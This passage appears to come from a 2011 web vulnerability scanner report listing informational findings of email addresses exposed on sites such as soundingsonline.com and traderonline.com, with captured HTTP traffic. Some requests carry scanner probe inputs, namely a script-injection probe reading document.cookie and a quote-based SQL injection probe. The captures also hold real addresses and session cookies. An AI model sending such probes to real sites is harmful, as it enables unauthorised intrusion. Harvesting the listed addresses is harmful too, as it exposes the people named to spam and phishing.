...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.426. http://www.soundingsonline.com/news/mishaps-a-rescues previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:27:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.427. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:16:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 13:16:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.428. http://www.soundingsonline.com/news/sailing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.429. http://www.soundingsonline.com/news/todays-top-stories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.430. http://www.soundingsonline.com/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.431. http://www.soundingsonline.com/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/s_code.js

Issue detail

The following email address was disclosed in the response:

kevin.rogers@dominionenterprises.com

Request

GET /s_code.js HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Content-Length: 33956
Content-Type: application/x-javascript
Last-Modified: Fri, 22 Jan 2010 21:42:50 GMT
Accept-Ranges: bytes
ETag: "d4e125d8ab9bca1:2b06"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:23:53 GMT
Connection: close

/***********************************************/
/*
SiteCatalyst code version: H.21.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.25.2010
*/
/***********************************************/

var s_account="desoundings"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/* You may add
...[SNIP]...

24.432. http://www.soundingsonline.com/site-map previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.433. http://www.soundingsonline.com/subscription-services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.434. http://www.soundingsonline.com/subscription-services/preview-current-issue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

24.435. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/subscribe-to-e-newsletter

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.436. http://www.speech.cs.cmu.edu/~sburke/pub/luhn_lib.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.speech.cs.cmu.edu
Path:	/~sburke/pub/luhn_lib.html

Issue detail

The following email address was disclosed in the response:

bfrisch@cs.cmu.edu

Request

GET /~sburke/pub/luhn_lib.html HTTP/1.1
Host: www.speech.cs.cmu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:37:07 GMT
Server: Apache/2
Location: http://interglacial.com/~sburke/pub/luhn_lib.html
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://interglacial.com/~sburke/pub/luhn_lib.ht
...[SNIP]...
<a href="mailto:bfrisch@cs.cmu.edu">
...[SNIP]...

24.437. http://www.thefeast.com/boston/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/

Issue detail

The following email address was disclosed in the response:

boston@thefeast.com

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.438. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The following email address was disclosed in the response:

boston@thefeast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.439. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The following email addresses were disclosed in the response:

Boston@thefeast.com
boston@thefeast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<em>Boston@thefeast.com</em>
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.440. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The following email address was disclosed in the response:

boston@thefeast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.441. http://www.thepointebrodiecreek.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thepointebrodiecreek.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@thepointebrodiecreek.com

Request

GET / HTTP/1.1
Host: www.thepointebrodiecreek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.442. http://www.traderonline.com/advertise/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/advertise/

Issue detail

The following email addresses were disclosed in the response:

mcmillan@dominionenterprises.com
sam.leary@cycletrader.com

Request

GET /advertise/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>TraderOnline.com Advertising</title>
<meta name="description" content="Advertise with TraderOnline.com, Boat Tra
...[SNIP]...
<a href="mailto:mcmillan@dominionenterprises.com" title="Contact Sales">
...[SNIP]...
<a href="mailto:sam.leary@cycletrader.com" title="Contact Keysales">
...[SNIP]...

24.443. http://www.traderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/javascript/master_s_code.js

Issue detail

The following email addresses were disclosed in the response:

id@Ls.tc
kevin.rogers@dominionenterprises.com

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:32 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32369

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}

function tourWndw() {
var imtTour=wind
...[SNIP]...
***
Includes for s_code condition from nav.templ
*********************************/
/***********************************************/
/*
SiteCatalyst code version: H.17.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.05.2009
*/
/***********************************************/

var s_account="detraderonline"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/*
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

24.444. http://www.traderonline.com/security/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/security/

Issue detail

The following email address was disclosed in the response:

fraud@traderonline.com

Request

GET /security/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 40567

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>TraderOnline.com Safety & Fraud Center - Protect Yourself from Online Fraud</title>
<meta name="description"
...[SNIP]...
<a href="mailto:fraud@traderonline.com">fraud@traderonline.com</a>
...[SNIP]...
<a href="mailto:fraud@traderonline.com">fraud@traderonline.com</a>
...[SNIP]...

24.445. http://www.w-w-i.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/

Issue detail

The following email address was disclosed in the response:

ronny.adsetts@amazinginternet.com

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:55 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Online Press Office</title>
<meta name="keywords" content="World Wi
...[SNIP]...
<![CDATA[
// AINet JavaScript
// Copyright 2008 Ronny Adsetts (ronny.adsetts@amazinginternet.com)
var div = bw.dom ? document.getElementById('bodytbl') : bw.ie4 ? document.all['bodytbl'] : 0;
if (div.scrollHeight >
...[SNIP]...

24.446. http://www.w-w-i.com/velux_5_oceans_2010_race previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/velux_5_oceans_2010_race

Issue detail

The following email address was disclosed in the response:

webmaster@amazing-internet.net

Request

GET /velux_5_oceans_2010_race HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
Vary: accept-language,accept-charset,Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1104

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:webmaster@amazing-internet.net" />
...[SNIP]...
<a href="mailto:webmaster@amazing-internet.net">
...[SNIP]...

24.447. http://www.w-w-i.com/velux_5_oceans_2010_race/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/velux_5_oceans_2010_race/

Issue detail

The following email address was disclosed in the response:

ronny.adsetts@amazinginternet.com

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<![CDATA[
// AINet JavaScript
// Copyright 2008 Ronny Adsetts (ronny.adsetts@amazinginternet.com)
var div = bw.dom ? document.getElementById('bodytbl') : bw.ie4 ? document.all['bodytbl'] : 0;
if (div.scrollHeight >
...[SNIP]...

24.448. http://www.w3.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3.org
Path:	/

Issue detail

The following email address was disclosed in the response:

site-comments@w3.org

Request

GET / HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:14 GMT
Server: Apache/2
Content-Location: Home.html
Vary: negotiate,accept,Accept-Encoding
TCN: choice
Last-Modified: Mon, 24 Jan 2011 03:48:27 GMT
ETag: "7206-49a8f78f278c0;89-3f26bd17a2f00"
Accept-Ranges: bytes
Content-Length: 29190
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:50:14 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a href="mailto:site-comments@w3.org">
...[SNIP]...

24.449. http://www.w3.org/TR/css3-selectors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3.org
Path:	/TR/css3-selectors/

Issue detail

The following email addresses were disclosed in the response:

ian@hixie.ch
www-style@w3.org

Request

